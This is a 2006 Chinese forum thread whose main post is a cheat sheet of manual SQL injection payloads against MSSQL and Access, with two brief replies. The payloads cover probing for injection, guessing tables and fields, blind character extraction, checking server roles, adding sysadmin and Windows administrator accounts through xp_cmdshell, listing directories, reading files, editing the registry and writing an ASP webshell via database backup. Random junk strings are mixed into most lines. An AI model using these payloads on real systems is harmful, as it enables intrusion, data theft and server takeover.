社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3643阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 6VVxpDAi:  
  2.初步判断是否是mssql ;and user>0 X</Sl>[8  
$v #  
  3.注入参数是字符'and [查询条件] and ''=' ~_Fx2T:X  
|'z24 :8  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' NU3TXO  
L""ZI5J{F9  
  5.判断数据库系统 :;eQ*{ `\  
'%wSs,HD  
  ;and (select count(*) from sysobjects)>0 mssql @_?2iN?4Z  
]A5Y/dd  
  ;and (select count(*) from msysobjects)>0 access @6|<c  
Xdx8HB@L  
~^jPE)  
Qrt\bz h/}  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 c?e-2Dp(  
n~]"sTC}&  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 g'b|[ q  
#:+F  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 >}\s-/  
jU~ x^Y  
  9.(1)猜字段的ascii值(access) :L@n(bu RN  
!Ve0:$  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 \8=)X})  
}8" |q3k  
  (2)猜字段的ascii值(mssql) l _%<U  
NLK1IH#  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 i%[gNh  
|Y05 *!\P*  
  10.测试权限结构(mssql) 0&j90J$`  
V:'F_/&X?  
C\;l)h_{  
h x&"fe  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 8QK8q: |  
nq HpYb6I0  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- YI ?P@y  
|Z94@uB  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- "gJ.mhHX  
Y(bB7tR  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- hPSMPbI  
&Ap9h# dK  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ^)?Wm,{"w  
(;;ji!i  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- fs 2MYat  
)xccs'H  
  ;and 1=(select IS_MEMBER('db_owner'));-- :MY=Q]l  
x<M::")5!V  
vhbHt_!u&  
-f&vH_eK  
  11.添加mssql和系统的帐户 'mbLK#q  
V~[b`&F  
  ;exec master.dbo.sp_addlogin username;-- R|$AcNp  
  ;exec master.dbo.sp_password null,username,password;-- #55:qc>m  
On}1&!{1]  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Ao8ua|:  
>fzyD(>  
  ;exec master.dbo.xp_cmdshell 'net user username password c>K]$;}  
l;0([_>*j  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- $uDgBZA\  
X':FFD4h  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- Z::I3 Q  
eZAMV/]jH  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ,\iHgsZ  
TLVsTM8 P  
QF/_?Tm4  
&{.IUg  
  12.(1)遍历目录 BP@tI|  
e' o2PW  
  ;create table dirs(paths varchar(100), id int) 9>w~B|/  
RB+Jp  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' Au'y(KB  
o& FOp'  
  ;and (select top 1 paths from dirs)>0 "H[K3  
yiQ?p:DM  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) wpM2{NTP  
zp;!HP;/=  
UgGa]b[9A  
cl4z%qv*  
  (2)遍历目录 Q}@t'  
GNMOHqg4  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- O|,9EOrP  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 i`2SebDj'w  
;7z6B|8  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ]nUrE6  
 C7ivA h  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 {IJ;)<>&VE  
%US&`BT!  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ESRj<p%W  
hJ{u!:4  
9)1Ye  
NS z }  
  13.mssql中的存储过程 VQHB}Y@^  
C*b[J  
  xp_regenumvalues 注册表根键, 子键 9Vm1q!lE  
sWo`dZ\6WB  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 5q0L<GOrj  
+_7a/3kh  
  xp_regread 根键,子键,键值名 _J!^iJ  
<3{MS],<<  
  ;exec xp_regread ~gd#cL%  
Lmte ~oBi  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 losqc *|  
I@KM2 KMN  
  xp_regwrite 根键,子键, 值名, 值类型, 值 _eiqs  
)*]A$\Oc[  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 PK2;Ywk`  
X!Z)V)@J8  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 WT ;2aS:  
%, psUOY  
  xp_regdeletevalue 根键,子键,值名 G(a5@9F  
MT&aH~YB  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 =tP9n;D  
y{hg4|\  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 8D )nM|  
*,$5EN  
zkRAul32|  
GM%OO)dO}  
  14.mssql的backup创建webshell /9R0}4i7  
fIoc)T  
  use model :0l+x 0l}  
7{F\b  
  create table cmd(str image); M_ukG~/  
wN!\$i@E:  
  insert into cmd(str) values (''); V6][*.i!9  
[LnPV2@e  
  backup database model to disk='c:\l.asp'; src9EeiV  
!l $d^y345  
4?+K `  
U.<j2K um  
  15.mssql内置函数 Rs<q^w]  
s-"KABEE  
  ;and (select @@version)>0 获得Windows的版本号 ] ]U)wg  
C(XV YND3  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa Q ]CMm2L^f  
Hx gC*-A$/  
  ;and (select user_name())>0 爆当前系统的连接用户 `yv?PlKL  
#BLHHK/[  
  ;and (select db_name())>0 得到当前连接的数据库 ;_bRq:!j;  
0~ho/_  
J 4gtm"2)  
j?N<40z  
  16.简洁的webshell l}uZxKuYx  
dS6 $  
  use model k9x[( #  
0zH-g  
  create table cmd(str image);  =1Sny7G  
*-9i<@|(U^  
  insert into cmd(str) values (''); C.S BJ  
EVqW(|Xg  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
温馨提示:欢迎交流讨论,请勿纯表情、纯引用!
认证码:
验证问题:
10+5=?,请输入中文答案:十五